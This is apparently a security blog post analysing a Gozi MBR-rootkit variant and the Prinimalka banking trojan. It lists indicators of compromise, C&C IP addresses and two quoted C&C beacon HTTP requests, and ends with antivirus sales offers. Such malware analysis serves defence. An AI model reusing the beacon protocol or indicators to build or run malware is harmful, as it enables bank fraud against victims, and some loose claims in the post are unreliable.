It seems as if security firm, Trusteer, has identified a new variant of the Gozi financial malware. This one is more sophisticated and requires your attention. This new variant infects the Master Boot Record (MBR) on your computer — which is a boot sector software device that resides at the beginning of your hard drive that tells your computer how to boot up.
Just like TDL4, another MBR infector, this malware is hard to detect and remove. The main idea behind Gozi, though, is to wait for Internet Explorer to be launched on the victim’s machine, and malicious code is injected into the Process. This allows the malware to intercept web traffic, and inject its own code to webpages, misleading the user and collecting financial information (as well as social security numbers, birth dates, etc.).
Some speculate other developers have taken over, since apparently the main developer as well as accomplices were arrested not long ago. Looks like the new developers have a more sophisticated twist on the whole situation.
What’s different? The MBR rootkit component. This component makes the malware more sophisticated, because the removal of such threat can cause the computer to fail booting. The main problem at trying to fix infections in the MBR is that occasionally, the backup code that is placed in a different sector, is modified to not work when the infection locks in. This makes you have to keep it on the machine. However, it’s more effective to use private tools to help remove it.
One of the private tools, well sort of private, is the Kaspersky Rescue Disc. There are others that are available also, including TDSSKiller, which may or may not work out correctly.
If you need further help, we would love to assist. Please comment at any time!
A Gozi-looking variant, Trojan Prinimalka, is identified in the Project Blitzkrieg related issues for this Fall. It’s unclear if the botherders are part of Project Blitzkrieg, however, it most certainly looks like them. This botnet issue is described as a “war on banks” and that “banks are not ready”.
What’s more is that with the attacks on banks, like on HSBC a few weeks ago, to JPMorganChase banking over a month ago – it seems unclear if the botnet was used to construct these attacks. Security researchers of top research firms are unsure of the conditions of the attacks, and have made many attempts to get some data to help investigate all of this.
Here will be described some of the details of the malware used in this botnet, Trj.Prin as seCURE Connexion labels it, or its main names Gozi-Prinimalka or just Trojan.Prinimalka.
Confused yet? Trojan.Prinimalka is a banking trojan used for a botnet, which is then used as a means to DDoS a banking website/server.
Two distinct variants used: “gov” and “nah”
Generalities of both variants
- Mutex: sdfsdfsdfsdfsfsdfsdfsdfsdfsdf
- Configuration values for the botnet are automatically added by the dropper to the Registry under “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion”
- A random port is added to localhost (127.0.0.1), which allows the type 2 proxy SCKS command to function, and binds itself to cmd.exe on localhost for the TELN command.
- Makes anonymous requests to banking websites via the zombie computer (the victim’s computer).
- It attempts to inject itself inside of normal Windows System Processes, such as services.exe, svchost.exe, SYSTEM, smss.exe, winlogon.exe, lsass.exe, csrss.exe, etc.
- There are different bank URLs targeted also, that can be used in a bait-and-switch operation. Mainly acting like a HOSTS file, where it can change the URL and redirect the banking site, so login information or other personal information can be obtained.
- Quick whois queries on the IP addresses identifies “Ruslan Storozhenko” (Yes?) at hosting company “Tehnologii Budushego LLC”. Which this comes at no surprise, since the ngrBot was hosted at Tehnologii Budushego LLC. Not saying the hosting company is bad, however, the company should be on big watchout for fraudulent activity.
- The IP address 126.96.36.199 is related to multiple password stealing and banking trojans. Project Honeypot calls the IP address part of a dictionary attacker and content spammer.
- Below is the general configuration and commands.
- Type 1 command example on XP system: GET /system/prinimalka.py/command?user_id=33520xxxxx&version_id=022201&crc=00000000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 213.***.**.104
- Dropped files:
- %UserProfile%\govXXXX.exe–the “X”s are random lowercase letters
- To be able to proliferate the malware through the system, it has to first start with govtemp1.exe, which is the dropper/downloader. It then will attempt to update with govold.exe to make sure it has a new version. Sometimes it decides if a shutdown is needed, especially if the computer cannot be used in the botnet (I.E. computer not powerful enough, too much lag, etc.), it will overwrite the first four bytes of “\\.\PHYSICALDRIVE0” and then shutdown the computer.
- It maintains its presence on the machine by monitoring/reinstalling as needed, with govXXXX.exe.
- Primary command & call address (C&C): 188.8.131.52
- Configuration can be changed to nah as described below.
- Other than having very similar features to the gov variant, except that the files are prefixed with “nah” instead of “gov”.
- It does have a different configuration for its command (type 2 command, XP system): GET /system/prinimalka.py/options?user_id=33520xxxxx&version_id=022201&crc=34661b26&uptime=00:00:00:59&port=5641&ip= HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 193.xxx.92.xxx
Overall, this banking trojan has quite some robust actions, but nothing real new. It appears like the Gozi trojan quite a bit, and may be a competitor to some other botnets like TDL or something.
To protect against botnets and other malware, don’t miss out on your chance for security software below (two specials):
Kaspersky ONE Universal Security – $25 off & get Laplink PCmover Home FREE!
Get avast! Internet Security 7 for 25% off now!